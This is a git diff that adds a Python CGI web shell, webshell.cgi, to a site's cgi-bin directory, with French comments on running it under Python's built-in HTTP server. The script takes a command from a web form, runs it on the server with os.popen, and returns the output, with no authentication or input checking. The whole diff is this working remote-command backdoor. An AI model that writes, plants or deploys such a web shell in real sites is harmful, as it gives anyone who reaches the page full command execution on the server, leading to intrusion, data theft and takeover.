diff options
Diffstat (limited to 'html/cgi-bin')
| -rwxr-xr-x | html/cgi-bin/webshell.cgi | 35 |
1 files changed, 35 insertions, 0 deletions
diff --git a/html/cgi-bin/webshell.cgi b/html/cgi-bin/webshell.cgi new file mode 100755 index 0000000..6598d37 --- /dev/null +++ b/html/cgi-bin/webshell.cgi @@ -0,0 +1,35 @@ +#!/usr/bin/env python3 + +# après avoir lancé le serveur : python3 -m http.server --cgi +# placer le script (rendu exécutable) dans /cgi-bin... + +import cgi +import os + +form = cgi.FieldStorage() +cmd = form.getvalue('command') +user = os.getlogin() +host = os.environ.get('SERVER_NAME') +pwd = os.environ.get('PWD') + +print("Content-Type: text/html; charset=UTF-8\n\n") +print (""" +<html> +<head> +<title>Web shell</title> +</head> +<body> +<h1>Web shell</h1> +<p>Entrez votre commande : </p> +<form action=''> +<input type='text' name='command' id='command' /> +<input type='submit' value='submit' /> +</form>""") +if cmd : + print("<pre style='display:inline-block;min-width:50em;padding:1em;background-color:black;color:white'>") + print(f"{user}@{host}:{pwd}$ {cmd}\n{os.popen(cmd).read()}") + print("</pre>") +print(""" +<script>document.getElementById("command").focus()</script> +</body> +</html>""") |